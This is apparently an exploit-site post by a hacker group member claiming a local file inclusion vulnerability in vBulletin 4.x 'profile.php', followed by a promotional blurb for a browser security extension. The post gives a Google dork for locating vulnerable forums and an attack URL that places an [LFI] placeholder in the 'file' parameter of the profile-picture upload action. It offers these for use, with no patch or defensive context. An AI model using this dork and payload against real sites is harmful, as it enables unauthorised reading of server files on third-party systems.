========================================================================================
| # Title : vBulletin 4.x 'profile.php' Local File Inclusion Vulnerability |
| # Author : KedAns-Dz |
| # email : Ked-h@hotmail.com |
| # Home : HMD/AM (30500/04300) - Algeria -(00213555248701) |
| # Web Site : /(~_-)\ ... |
| # Platform : php |
| # Application : vBulletin 4.x Forums |
| # Rank = Excellent Ranking ... |
====================== Exploit By KedAns-Dz =================================
# GOogle D0rk : "Powered by vbulletin 4. "
# Exploit :
> http://[Target]/[path]/profile.php?do=editprofilepic
> .../profile.php?do=editprofilepic&action=upload&file=[LFI]&nojs=1#community
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================|
#[»] Team : [D] HaCkerS-StreeT-Team [Z] > Algerians Hackers < |
# Greetz : Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride * Massinhou-Dz |
# Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED * all my friends .. |
#------------------------------------------------------------------------------|
J2TEAM Security: A must-have extension for Chrome users.
Install now!
My name is Manh Tuan. I'm the leader of J2TEAM, the team behind J2TEAM Security, J2TEAM Cookies, Death Click and J2TEAM Community.